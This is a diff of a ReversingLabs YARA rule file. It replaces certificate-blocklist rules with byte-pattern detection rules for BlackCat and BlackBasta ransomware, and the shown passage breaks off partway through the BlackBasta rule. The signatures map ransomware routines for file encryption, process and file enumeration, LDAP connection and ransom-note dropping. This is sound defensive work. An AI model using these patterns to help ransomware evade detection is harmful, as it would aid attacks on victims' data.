-		logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4"
+		logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackCat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ??
+            ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75
+            ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85
+        }
+		$remote_connection_p2 = {
+            C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0
+            75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ??
+            53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24
+            ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89
+            44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB
+        }
+		$enum_procs = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ??
+            69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89
+            F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ??
+            85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89
+            45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB
+        }
+		$find_files = {
+            57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ??
+            ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ??
+            8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45
+            ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75
+            ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89
+            45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ??
+            89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B
+            ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89
+            55 ?? 72 ?? 83 F9 ?? 76
+        }
+		$encrypt_files_p2 = {
+            53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57
+            6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92
+            45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B
+            55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ??
+            ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ??
+            89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRASAD UPENDRA" and pe.signatures [ i ] . serial == "45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackBasta ransomware."
 		author = "ReversingLabs"
-		id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb"
+		date = "2022-09-01"
+		modified = "2022-12-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1978-L1994"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728"
+		logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackBasta"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RuN APps FOrEver lld" and pe.signatures [ i ] . serial == "03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1996-L2012"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6
+            E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88
+            9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75
+            ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15
+        }
+		$encrypt_files_v1 = {
+            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
+            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+        }
+		$cmd_prompt = {
+            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB
+            68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ??
+            ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8
+            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ??
+            83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D
+            45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ??
+            83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53
+        }
+		$ldap_connect = {
+            C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ??
+            50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6
+            6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ??
+            ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B
+            06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D
+            ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ??
+            8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF
+            50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15
+        }
+		$encrypt_files_v2 = {
+            8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B
+            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75
+            ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files_v3 = {
+            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
+            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6
+            45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$encrypt_files_v4 = {
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ??
+            8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ??
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B
+            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B
+            50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$drop_ransom_note_v1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
+            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$exclude_from_encryption_v1 = {
+            83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85
